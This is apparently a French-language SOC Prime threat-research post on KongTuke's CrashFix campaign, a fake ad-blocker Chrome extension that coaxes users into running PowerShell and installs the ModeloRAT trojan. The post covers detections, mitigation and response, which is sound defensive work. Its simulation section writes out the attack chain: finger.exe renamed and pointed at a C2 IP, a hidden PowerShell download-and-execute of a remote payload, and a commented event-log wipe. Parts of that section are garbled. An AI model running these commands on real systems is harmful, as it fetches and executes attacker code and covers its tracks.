SOC Prime Bias: Critique

21 Jan 2026 16:34 UTC

Disséquer CrashFix : Le Nouveau Jouet de KongTuke

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Suivre
Disséquer CrashFix : Le Nouveau Jouet de KongTuke
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

KongTuke a distribué une extension Chrome malveillante, NexShield, imitant uBlock Origin Lite. Une fois installée, elle affiche un avertissement de sécurité « CrashFix » pour simuler un incident de sécurité légitime du navigateur, fait planter le navigateur et contraint l’utilisateur à exécuter une commande PowerShell malveillante copiée dans le presse-papiers. La campagne déploie un RAT Python, ModeloRAT, sur les systèmes joints à un domaine et une chaîne PowerShell à plusieurs étapes sur les hôtes autonomes.

Enquête

Les analystes de Huntress ont examiné le code de l’extension, lié le command-and-control à nexsnield.com et effectué une ingénierie inverse des charges utiles. Ils ont observé l’abus de finger.exe en tant que LOLBin pour récupérer les instructions de l’attaquant, ainsi qu’un DGA qui génère des domaines .top. Pour les environnements sur un domaine, les chercheurs ont identifié un implant Python chiffré en RC4 qui persiste via la clé HKCU Run. Le savoir-faire supplémentaire comprenait des contrôles anti-analyse, contournements de l’AMSI, et des tactiques d’épuisement des ressources destinées à pousser les utilisateurs à une conformité pleine et rapide.

Atténuation

Bloquez l’ID de l’extension Chrome et surveillez les extensions inconnues qui imitent des bloqueurs de publicité populaires. Détectez le beaconing vers nexsnield.com, les IP C2 et les domaines produits par le DGA. Appliquez le contrôle d’exécution pour limiter l’utilisation de LOLBin (y compris finger.exe) et alertez sur les valeurs de clé Run suspectes, en particulier les noms conçus pour ressembler à des logiciels largement utilisés.

Réponse

Alertez sur les installations d’extensions liées à NexShield et corrélez avec les connexions sortantes vers l’infrastructure C2 et DGA identifiée. Isolez les hôtes affectés et collectez les artefacts de l’extension, les clés de registre Run, les tâches programmées et les fichiers déposés. Supprimez la persistance de ModeloRAT, éradiquer les composants étagés de PowerShell, remédiez et validez le point d’extrémité.

Flux d’attaque

Détections

Appel de méthodes .NET suspectes à partir de Powershell (via powershell)

Équipe SOC Prime
21 Jan 2026

Utilisation suspecte de CURL (via cmdline)

Équipe SOC Prime
21 Jan 2026

Nom de fichier court (via cmdline)

Équipe SOC Prime
21 Jan 2026

Possibilité d’opération manuelle ou de script effectuée dans des dossiers inhabituels (via cmdline)

Équipe SOC Prime
21 Jan 2026

Chaînes PowerShell suspectes (via powershell)

Équipe SOC Prime
21 Jan 2026

Appel de fonctions de l’API Windows suspectes depuis Powershell (via powershell)

Équipe SOC Prime
21 Jan 2026

Points de persistance possibles [ASEPs – Hive Software/NTUSER] (via registry_event)

Équipe SOC Prime
21 Jan 2026

Un archive a été extraite dans un répertoire suspect à l’aide de PowerShell (via powershell)

Équipe SOC Prime
21 Jan 2026

Exécution de Python à partir de dossiers suspects (via cmdline)

Équipe SOC Prime
21 Jan 2026

Indicateurs possibles d’obfuscation de PowerShell (via powershell)

Équipe SOC Prime
21 Jan 2026

Possibilité d’énumération du système (via cmdline)

Équipe SOC Prime
21 Jan 2026

Téléchargement ou téléversement via PowerShell (via cmdline)

Équipe SOC Prime
21 Jan 2026

IOC (SourceIP) à détecter : Dissection de CrashFix : Le Nouvel Outil de KongTuke

Règles AI SOC Prime
21 Jan 2026

IOC (HashSha256) à détecter : Dissection de CrashFix : Le Nouvel Outil de KongTuke

Règles AI SOC Prime
21 Jan 2026

IOC (DestinationIP) à détecter : Dissection de CrashFix : Le Nouvel Outil de KongTuke

Règles AI SOC Prime
21 Jan 2026

IOC (Emails) à détecter : Dissection de CrashFix : Le Nouvel Outil de KongTuke

Règles AI SOC Prime
21 Jan 2026

Détecter l’exécution de commande malveillante CrashFix de KongTuke [Création de processus Windows]

Règles AI SOC Prime
21 Jan 2026

Détection de contournement de l’AMSI et suppression des preuves via PowerShell [Windows PowerShell]

Règles AI SOC Prime
21 Jan 2026

Exécution de simulation

Pré-requis : La vérification téléphonique & de référence doit avoir réussi.

Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection.

  • Narration de l’attaque & Commandes :
    L’adversaire copie d’abord la finger.exe binaire légitime dans le répertoire temporaire, le renomme en ct.exe, et utilise ensuite une chaîne cmd /c imbriquée pour invoquer le binaire copié avec un argument spécialement conçu qui contacte un serveur C2 distant (199.217.98.108). Le binaire streaming la charge utile vers la ligne de commande, qui est ensuite envoyée dans un second cmd cmd /c puis l'exécuté en utilisant PowerShell pour télécharger une charge utile secondaire via iexet l’exécute immédiatement avec. Toutes les étapes sont effectuées avec une interface utilisateur minimale (. Toutes les étapes sont effectuées avec une interface utilisateur minimale (

     ) pour éviter la détection par utilisateur.
  • 1. Copier finger.exe → %TEMP%ct.exe 2. Exécuter : cmd /c start «  » /min cmd /c « copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd » 3. Téléchargement & exécution de la charge utile secondaire via PowerShell : powershell -NoProfile -WindowStyle Hidden -Command « iex (Invoke-WebRequest -Uri ‘http://199.217.98.108/payload.ps1’ -UseBasicParsing).Content » Script de test de régression :

    Le script ci-dessous reproduit la chaîne d'attaque complète sur une machine de test Windows. Exécutez-le dans une session PowerShell avec élévation.
  • Nettoyer les commandes : Supprimez les artefacts et terminez tous les processus persistants créés par le test.

    # Supprimer le ct.exe copié
    Remove-Item -Path "$env:TEMPct.exe" -ErrorAction SilentlyContinue
    
    # Tuez tous les processus cmd.exe ou powershell.exe résiduels lancés par le test (filtrez par ligne de commande spécifique)
    Get-WmiObject Win32_Process |
        Where-Object { $_.CommandLine -match 'finger.exe|199.217.98.108' } |
        ForEach-Object { $_.Terminate() }
    
    # Optionnel : effacez le journal des événements si nécessaire pour la répétition
    # wevlutil cl Security